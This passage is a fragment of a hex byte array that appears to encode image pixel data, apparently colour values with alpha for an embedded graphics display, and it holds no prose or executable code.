0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xf8, 0x20, 0xff, 0x3b, 0x40, 0xff, 0x00, 0x80, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x76, 0xb5, 0x00, 0xff, 0xff, 0x00, 0x9a, 0xd6, 0x00, 0xf9, 0xbd, 0x00, 0x45, 0xff, 0x00, 0x0d, 0xef, 0x18, 0x47, 0xff, 0xbc, 0xe6, 0xfe, 0xf8, 0xc4, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe5, 0xfe, 0xff, 0x0c, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x0c, 0xf7, 0xff, 0x0c, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x52, 0xf7, 0xff, 0x4f, 0xf7, 0xff, 0x4d, 0xf7, 0xff, 0x4c, 0xf7, 0xff, 0x2d, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0xe4, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xef, 0x60, 0xff, 0x94, 0x00, 0xff, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xef, 0x00, 0xbe, 0xf7, 0x00, 0x9a, 0xd6, 0x08, 0x5a, 0xc6, 0x07, 0x43, 0xff, 0x20, 0x21, 0xff, 0xf0, 0xc7, 0xfe, 0xff, 0xcb, 0xf6, 0xff, 0xec, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xe7, 0xf6, 0xff, 0xe4, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe8, 0xf6, 0xff, 0x0f, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x51, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0x40, 0xff, 0xd4, 0x60, 0xff, 0x04, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9a, 0xd6, 0x00, 0x9a, 0xd6, 0x07, 0x79, 0xce, 0x17, 0x79, 0xce, 0x13, 0x79, 0xd6, 0x10, 0xb4, 0xee, 0x30, 0xc9, 0xf6, 0xb0, 0xed, 0xf6, 0xff, 0x10, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xec, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0x0c, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x9a, 0xf7, 0xff, 0x9c, 0xf7, 0xff, 0x9c, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0xeb, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0x7b, 0xc0, 0xfe, 0x13, 0x00, 0xff, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0xd6, 0x00, 0x9a, 0xd6, 0x0f, 0xdb, 0xde, 0x28, 0x7a, 0xd6, 0x1b, 0xba, 0xd6, 0x1f, 0xba, 0xde, 0x2c, 0xfd, 0xde, 0x48, 0xf3, 0xee, 0xb8, 0xf0, 0xf6, 0xff, 0x12, 0xf7, 0xff, 0x13, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xe8, 0xf6, 0xff, 0xe0, 0xfe, 0xff, 0xc1, 0xfe, 0xf8, 0x02, 0xff, 0x37, 0x01, 0xff, 0x00, 0x20, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7a, 0xd6, 0x00, 0x59, 0xce, 0x13, 0xdb, 0xde, 0x47, 0xdb, 0xde, 0x27, 0xbb, 0xde, 0x1f, 0x9e, 0xd6, 0x27, 0x10, 0xef, 0x8b, 0xea, 0xf6, 0xfb, 0xeb, 0xf6, 0xff, 0x12, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0xe8, 0xf6, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x20, 0xff, 0xf0, 0x81, 0xff, 0x3f, 0x60, 0xff, 0x00, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0xe6, 0x00, 0x1c, 0xe7, 0x08, 0xba, 0xd6, 0x33, 0xbb, 0xde, 0x30, 0xfc, 0xde, 0x23, 0x28, 0xf7, 0x80, 0xe6, 0xfe, 0xff, 0xc8, 0xf6, 0xff, 0xc7, 0xf6, 0xff, 0xec, 0xf6, 0xff, 0x12, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x9b, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0xee, 0xf6, 0xff, 0xe7, 0xf6, 0xff, 0xe2, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xff, 0x60, 0xff, 0x3b, 0x80, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xef, 0x00, 0xbe, 0xf7, 0x00, 0xbb, 0xde, 0x0b, 0xba, 0xd6, 0x18, 0xb9, 0xd6, 0x20, 0xf1, 0xee, 0x3b, 0xcd, 0xf6, 0x8b, 0xc9, 0xf6, 0xeb, 0xc8, 0xf6, 0xff, 0xc7, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0x10, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0x0c, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0xc4, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xc4, 0xc0, 0xfe, 0x58, 0x20, 0xff, 0x18, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x39, 0xce, 0x00, 0xff, 0xff, 0x00, 0x7d, 0xef, 0x00, 0x1c, 0xe7, 0x04, 0xba, 0xd6, 0x0b, 0x79, 0xce, 0x10, 0xdd, 0xd6, 0x1b, 0x9f, 0xbe, 0x1c, 0xe9, 0xf6, 0xaf, 0xc5, 0xfe, 0xff, 0xc5, 0xfe, 0xff, 0xea, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0xed, 0xf6, 0xff, 0x32, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x0a, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0x0e, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0xed, 0xf6, 0xff, 0xc8, 0xf6, 0xff, 0xc8, 0xf6, 0x8c, 0xe0, 0xff, 0x00, 0xcc, 0xfe, 0x00, 0xc0, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x79, 0xce, 0x03, 0xdb, 0xde, 0x07, 0xbb, 0xde, 0x0b, 0x9f, 0xce, 0x0b, 0x47, 0xff, 0x7b, 0xe3, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xc4, 0xfe, 0xff, 0xe5, 0xfe, 0xff, 0xe6, 0xfe, 0xff, 0xe7, 0xf6, 0xff, 0x10, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x0c, 0xf7, 0xff, 0xe8, 0xf6, 0xff, 0xe8, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xe9, 0xf6, 0xf8, 0x0f, 0xef, 0x40, 0xd5, 0xde, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x7a, 0xd6, 0x07, 0xfb, 0xde, 0x08, 0xdb, 0xde, 0x0b, 0xbc, 0xd6, 0x0c, 0x2c, 0xf7, 0x3f, 0xe2, 0xfe, 0xfb, 0xc3, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xc4, 0xfe, 0xff, 0xc5, 0xfe, 0xff, 0xe6, 0xfe, 0xff, 0xe6, 0xfe, 0xff, 0x0e, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x2e, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x0c, 0xf7, 0xff, 0xe6, 0xfe, 0xff, 0xe5, 0xfe, 0xff, 0xe5, 0xfe, 0xff, 0xe6, 0xfe, 0xff, 0xc6, 0xfe, 0xff, 0xc6, 0xfe, 0xff, 0xc6, 0xfe, 0xff, 0x04, 0xff, 0xf0, 0xc0, 0xff, 0x08, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x9a, 0xd6, 0x07, 0x7a, 0xd6, 0x10, 0x7a, 0xd6, 0x18, 0x7a, 0xce, 0x17, 0xf2, 0xee, 0x2f, 0xc9, 0xf6, 0x6c, 0xc6, 0xfe, 0x8c, 0xc5, 0xfe, 0xb3, 0xc5, 0xfe, 0xff, 0xc6, 0xfe, 0xff, 0xc7, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0x0f, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x0b, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0xe8, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe3, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xc3, 0xfe, 0xf3, 0xc3, 0xfe, 0xa7, 0xc3, 0xfe, 0x83, 0xc5, 0xfe, 0x53, 0x80, 0xff, 0x13, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0xe7, 0x00, 0x5d, 0xef, 0x00, 0xba, 0xd6, 0x07, 0x7a, 0xd6, 0x13, 0xdb, 0xde, 0x24, 0xdb, 0xde, 0x2c, 0xdb, 0xde, 0x2c, 0xfd, 0xde, 0x24, 0xde, 0xd6, 0x24, 0xee, 0xee, 0x60, 0xc6, 0xfe, 0xff, 0xc9, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xee, 0xf6, 0xff, 0x33, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x59, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0xeb, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe3, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xec, 0x2f, 0xff, 0x1b, 0x7f, 0x8e, 0x04, 0xff, 0xef, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9a, 0xd6, 0x00, 0x7a, 0xd6, 0x04, 0xba, 0xd6, 0x13, 0xbb, 0xde, 0x1c, 0xfb, 0xde, 0x34, 0xfc, 0xe6, 0x58, 0xfb, 0xde, 0x5f, 0xfb, 0xde, 0x4f, 0xfa, 0xde, 0x4f, 0xec, 0xf6, 0xdf, 0xed, 0xf6, 0xff, 0xf0, 0xf6, 0xff, 0x12, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x36, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x79, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x7b, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xeb, 0xf6, 0xff, 0xe6, 0xfe, 0xff, 0xe3, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x20, 0xff, 0x83, 0x80, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfb, 0xde, 0x00, 0x1c, 0xe7, 0x07, 0x7a, 0xd6, 0x18, 0xba, 0xd6, 0x1c, 0xdb, 0xde, 0x28, 0xfb, 0xde, 0x54, 0xfc, 0xe6, 0x67, 0xfc, 0xe6, 0x64, 0x16, 0xef, 0x80, 0xee, 0xf6, 0xf8, 0x12, 0xf7, 0xf8, 0x36, 0xf7, 0xfb, 0x36, 0xf7, 0xfc, 0x58, 0xf7, 0xff, 0x59, 0xf7, 0xff, 0x59, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x59, 0xf7, 0xff, 0x7a, 0xf7, 0xff, 0x9c, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x0b, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0xc4, 0xfe, 0xff, 0xc1, 0xfe, 0xf7, 0xc0, 0xfe, 0xec, 0xc0, 0xfe, 0xef, 0xe0, 0xfe, 0xff, 0xe0, 0xff, 0x08, 0x6f, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9a, 0xd6, 0x00, 0x7a, 0xd6, 0x0b, 0xbb, 0xde, 0x20, 0xdb, 0xde, 0x24, 0xba, 0xd6, 0x2f, 0xdb, 0xde, 0x3f, 0xfb, 0xde, 0x43, 0xfb, 0xde, 0x4b, 0xf9, 0xe6, 0x5c, 0xf8, 0xe6, 0x7c, 0x1b, 0xef, 0x9f, 0x5d, 0xef, 0xc7, 0x57, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 0x58, 0xf7, 0xff, 